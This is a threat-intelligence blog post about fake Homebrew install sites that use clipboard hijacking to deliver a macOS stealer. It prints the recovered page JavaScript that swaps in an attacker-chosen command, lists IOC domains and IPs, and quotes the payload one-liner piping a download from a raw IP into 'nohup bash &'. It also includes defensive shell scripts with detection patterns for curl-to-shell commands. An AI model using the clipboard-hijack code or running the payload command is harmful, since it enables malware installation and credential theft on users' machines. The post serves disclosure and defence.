In September 2025, Kandji's security researchers identified multiple spoofed Homebrew installer sites designed to mimic the official brew.sh page. These replicas injected malicious payloads under the guise of a standard install. In this post, we examine the tactics, infrastructure, and impact of the campaign.
Seemingly every week, there's panic about a package manager (NPM, PyPI, and others) allowing a typosquatted malicious package to slip through review, or a popular library getting hit by a supply-chain compromise.
By contrast, Homebrew, arguably the most widely used package manager on macOS, has seen no recent compromises.
Search and you'll find nothing; the same can't be said for NPM, where you'll see dozens of articles about the Shai-Hulud package worm.
Does Homebrew have a better security review process (like the human review for Homebrew-core), or are threat actors just finding easier ways to compromise users?
Kandji Threat Intelligence has seen a recent increase in attackers using spoofed Homebrew webpages to get users to download malware. Just in the last week, we came across four Homebrew-related domains (homebrewoneline[.]org and others), all resolving to 38[.]146[.]27[.]144. These domains showed a carbon copy of the real Homebrew webpage at brew.sh.
Screenshot of the real Homebrew install page.
Screenshot of a spoofed Homebrew install page.
Rather than allowing users to highlight and copy the install command, the page forces them to use a single Copy button. That restriction is purposeful: it enables the attacker to inject an extra hidden command into the clipboard, outside of what is shown to the user on the webpage, which downloads a malicious payload in parallel with the Homebrew installer. This technique closely mirrors recent “ClickFix” social-engineering campaigns, where victims are coerced into pasting attacker-supplied shell commands (often under the pretense of solving a CAPTCHA). The result is a compact and effective initial infection vector.
What's Happening?
At the very bottom of the site's index file we found embedded JavaScript. That script is where the attacker places the command to be copied, and it is also what prevents users from simply selecting and copying the visible text: it suppresses the contextmenu, selectstart, copy, cut and dragstart events on the install block.
This forces victims to use the provided Copy button. When that button is clicked, the script writes the attacker-controlled string (not the text shown on the page) to the clipboard, then issues a POST request with a small JSON payload to notify.php, which logs the event name and click time back to the server. Russian-language comments in the code explicitly mark where the malicious command should be inserted and note that the notification is relayed by the PHP backend to Telegram. That strongly suggests the page was built as a reusable kit: malicious payload delivery as a service, configured by whoever operates it.
Combined with observed behavior of the same infrastructure downloading the Odyssey Stealer, the artifacts point to an active, commodity-style threat operation rather than a one-off.
Below is a screenshot showing the malicious command injected into the page, followed by the full JavaScript recovered from one of the hosting sites. When we captured that instance, the threat actor had not yet configured the command (copyCommand is still the placeholder echo). Before we published this post, it was updated to include a malicious, base64-encoded cURL payload.
// This command is what the button copies:
const copyCommand = 'echo '; // ← replace with the desired command

// Block right-click, text selection, copy, cut and drag on the install block,
// so the visible command cannot be copied by hand.
(function () {
  const block = document.getElementById('install-block');
  if (!block) return;
  block.addEventListener('contextmenu', function (e) { e.preventDefault(); }, { passive: false });
  block.addEventListener('selectstart', function (e) { e.preventDefault(); }, { passive: false });
  const inner = block.querySelector('.highlight');
  if (inner) {
    ['copy', 'cut', 'dragstart'].forEach(function (evt) {
      inner.addEventListener(evt, function (e) { e.preventDefault(); }, { passive: false });
    });
  }
})();

// Copy button handler: writes copyCommand (not the displayed text) to the
// clipboard, falling back to a hidden textarea plus execCommand('copy')
// when the Clipboard API is unavailable, then reports the click to the server.
async function copyInstallCommand() {
  try {
    if (navigator.clipboard && window.isSecureContext) {
      await navigator.clipboard.writeText(copyCommand);
    } else {
      const ta = document.createElement('textarea');
      ta.value = copyCommand;
      ta.setAttribute('readonly', '');
      ta.style.position = 'absolute';
      ta.style.left = '-9999px';
      document.body.appendChild(ta);
      ta.select();
      document.execCommand('copy');
      document.body.removeChild(ta);
    }
  } catch (err) {
    console.error('Clipboard copy failed', err);
  } finally {
    // Send a notification to the server (PHP -> Telegram)
    try {
      fetch('notify.php', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ event: 'copy_install_command', time: new Date().toISOString() })
      });
    } catch (e) { /* ignore */ }
  }
}

const copyBtn = document.getElementById('copy-install-btn');
if (copyBtn) {
  copyBtn.addEventListener('click', copyInstallCommand);
}
This isn’t the first time we’ve seen this tactic. Researcher Alden Schmidt and Intego documented the Cuckoo Stealer pivoting to fake Homebrew pages to trick users into installing an information stealer. In that case, the counterfeit Homebrew site hosted an installer script that mimicked the official install flow but contained malicious commands. The result is convincing: victims believe they’ve only installed Homebrew, while the attacker gains persistent access or exfiltrates secrets. Worryingly, some of these spoofed pages remain live for days or weeks before being taken down, increasing the window for infection.
Why does this matter?
Package managers like Homebrew are far more common on corporate developer machines than on casual users’ laptops. That concentration makes them an attractive target: compromising a developer’s machine can expose credentials, build systems, and internal artifacts, essentially a treasure trove for attackers. So it’s critical for developers, admins, and end users to treat not only the packages they install as sources of risk, but also the package managers themselves: always install them from official sources and verify any install instructions before running one-liner commands from the web.
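One practical way to act on that advice, and to see the clipboard trick described above from the victim's side: a POSIX shell function that vets what is about to be pasted into a terminal (for example the output of pbpaste on macOS) against the official Homebrew one-liner shown on brew.sh. This is an added example written for this post, not Kandji tooling and not code from the campaign. It returns 0 only on an exact match; otherwise it prints the hidden remainder with control characters made visible and names the tells seen in this campaign (a download piped into a shell, nohup, a trailing &, base64 decoding, plain http://, bare IP addresses). The hijacked clipboard text at the end is constructed for the demonstration; 203.0.113.10 is a documentation-only address, not an IOC.

```shell
#!/bin/sh
# vet_paste: inspect text about to be pasted into a terminal (for example the
# output of `pbpaste` on macOS) before it ever runs. Added example written for
# this post, not Kandji tooling. The only external fact it relies on is the
# official Homebrew one-liner as shown on brew.sh; everything else is constructed.

OFFICIAL_BREW_CMD='/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'

# flag PATTERN MESSAGE: print MESSAGE if the candidate command matches PATTERN (ERE).
flag() {
    if printf '%s\n' "$candidate" | grep -Eq -- "$1"; then
        printf '  - %s\n' "$2"
    fi
}

# vet_paste reads the candidate command on stdin.
# Returns 0 only if it is byte-for-byte the official installer command;
# otherwise prints what differs and why it is suspicious, and returns 1.
vet_paste() {
    candidate=$(cat)
    if [ "$candidate" = "$OFFICIAL_BREW_CMD" ]; then
        echo "OK: exact match for the official Homebrew install command"
        return 0
    fi
    echo "WARNING: clipboard text is not the official install command"
    # Show it with control characters made visible (cat -v renders CR as ^M),
    # so a hidden carriage return or escape sequence cannot conceal a second command.
    printf '%s\n' "$candidate" | cat -v | sed 's/^/  > /'

    # Whatever follows the genuine command is exactly what the page hid.
    rest=${candidate#"$OFFICIAL_BREW_CMD"}
    if [ "$rest" != "$candidate" ] && [ -n "$rest" ]; then
        printf '  - official command is followed by hidden extra text: %s\n' \
            "$(printf '%s' "$rest" | cat -v)"
    fi
    lines=$(printf '%s\n' "$candidate" | grep -c '')
    if [ "$lines" -gt 1 ]; then
        printf '  - %s lines: a terminal runs each one as soon as it is pasted\n' "$lines"
    fi
    flag 'curl[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(nohup[[:space:]]+)?(ba|z)?sh' \
         'pipes a download straight into a shell without letting you read it'
    flag '(^|[[:space:];|&])nohup[[:space:]]' \
         'uses nohup so the payload keeps running after the terminal closes'
    flag '&[[:space:]]*($|;)' \
         'backgrounds a command with &, i.e. runs it in parallel with the installer'
    flag 'base64[[:space:]]+(-d|-D|--decode)' \
         'decodes base64, a common way to keep the real command out of sight'
    flag 'http://' \
         'fetches over plaintext HTTP'
    flag 'https?://[0-9]{1,3}(\.[0-9]{1,3}){3}' \
         'downloads from a bare IP address rather than a project domain'
    return 1
}

# Constructed demonstration input: the official command with a hidden second
# line appended, in the style of the campaign. 203.0.113.10 is a
# documentation-only address, not a real IOC.
HIJACKED=$(printf '%s\n%s' "$OFFICIAL_BREW_CMD" \
           'curl -s http://203.0.113.10/d/example | nohup bash &')

echo "== genuine command =="
printf '%s' "$OFFICIAL_BREW_CMD" | vet_paste
echo "== hijacked clipboard =="
printf '%s' "$HIJACKED" | vet_paste || echo "verdict: do not paste this"
```

Save it as vet_paste.sh, source it with `. ./vet_paste.sh`, and run `pbpaste | vet_paste` before pressing Enter on any one-liner copied from a web page. The exact-match check is the part that matters; the pattern list only explains a mismatch and does not make a non-matching command safe to run.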
The Threat Intelligence team at Kandji continuously monitors for new infection vectors so that we can provide customers with bleeding-edge protection in Kandji EDR. Below are just a few of these spoofed Homebrew domains; many more exist and new ones continue to appear. We have also provided a link to a repo maintained by Mikhail Kasimov that contains many more known domains.
IOCs
Domains
homebrewfaq[.]org (active)
homebrewclubs[.]org
homebrewonline[.]org
homebrewupdate[.]org
Homebrewlub[.]com (active)
Command
curl -s http://185[.]93[.]89[.]62/d/vipx69930 | nohup bash &
Domain Repo
https://github.com/stamparm/maltrail/blob/master/trails/static/malware/osx_atomic.txt
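For after-the-fact triage on a machine that may have visited one of these pages, here is an added example (written for this post, not Kandji EDR detection logic): a shell function that walks a bash or zsh history file, strips the zsh EXTENDED_HISTORY prefix, flags commands that pipe curl output into a shell, and compares every URL host in each command against the IOC hosts listed above (kept in defanged form and refanged at runtime). The history file it runs over is constructed for the demonstration; the IOC entries are the ones from this post.

```shell
#!/bin/sh
# hunt_history: after-the-fact triage of a shell history file for curl-to-shell
# installs and for contact with the hosts listed as IOCs in this post.
# Added example written for this post, not Kandji EDR logic; the history
# lines below are constructed, the IOC hosts are the ones from the post.

IOC_HOSTS='homebrewfaq[.]org homebrewclubs[.]org homebrewonline[.]org
homebrewupdate[.]org homebrewlub[.]com 38[.]146[.]27[.]144 185[.]93[.]89[.]62'

# refang: turn the defanged a[.]b notation back into a real hostname.
refang() { printf '%s' "$1" | sed 's/\[\.\]/./g'; }

# hunt_history HISTORY_FILE
# Prints one line per suspicious command: "<reasons><TAB><command>".
# Handles plain bash history and zsh EXTENDED_HISTORY (": <epoch>:<secs>;cmd").
hunt_history() {
    iocs=$(for h in $IOC_HOSTS; do refang "$h"; echo; done | tr 'A-Z' 'a-z')
    while IFS= read -r raw; do
        cmd=${raw#': '[0-9]*':'[0-9]*';'}
        reasons=""
        if printf '%s\n' "$cmd" | grep -Eq 'curl[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(nohup[[:space:]]+)?(ba|z)?sh'; then
            reasons="curl-to-shell"
        fi
        # Pull every URL host out of the command (scheme and port stripped,
        # lower-cased) and compare it with the IOC list.
        for host in $(printf '%s\n' "$cmd" | grep -Eo 'https?://[^/[:space:]]+' \
                      | sed 's#^https\{0,1\}://##; s/:[0-9]*$//' | tr 'A-Z' 'a-z'); do
            if printf '%s\n' "$iocs" | grep -Fxq "$host"; then
                reasons="${reasons:+$reasons,}ioc-host:$host"
            fi
        done
        if [ -n "$reasons" ]; then
            printf '%s\t%s\n' "$reasons" "$cmd"
        fi
    done < "$1"
}

# Constructed zsh history (EXTENDED_HISTORY format) for the demonstration.
# Line 2 is the genuine installer and must not be flagged; line 3 is the
# command IOC from this post; line 5 is a made-up fetch from one of the domains.
SAMPLE_HISTORY=$(mktemp)
cat > "$SAMPLE_HISTORY" <<'EOF'
: 1758000000:0;ls -la
: 1758000060:0;/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
: 1758000061:0;curl -s http://185.93.89.62/d/vipx69930 | nohup bash &
: 1758000120:0;brew install jq
: 1758000200:0;curl -fsSL https://homebrewupdate.org/install.sh | bash
EOF

hunt_history "$SAMPLE_HISTORY"
```

Run it against ~/.zsh_history and ~/.bash_history for the affected user. The genuine Homebrew installer is not flagged: it is not a pipe into a shell, and raw.githubusercontent.com is not on the list. The function only sees commands the user typed; a payload fetched by the injected command itself leaves no history entry, so pair it with a check of your EDR or network telemetry for the same hosts.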
This campaign is a reminder that security risks aren't limited to the packages being installed; the package managers themselves can be weaponized. Mitigation depends on questioning what looks familiar, verifying software sources, and safeguarding the systems developers rely on most. Kandji Threat Intelligence will continue tracking and surfacing threats like these, so your team stays ahead of what's next.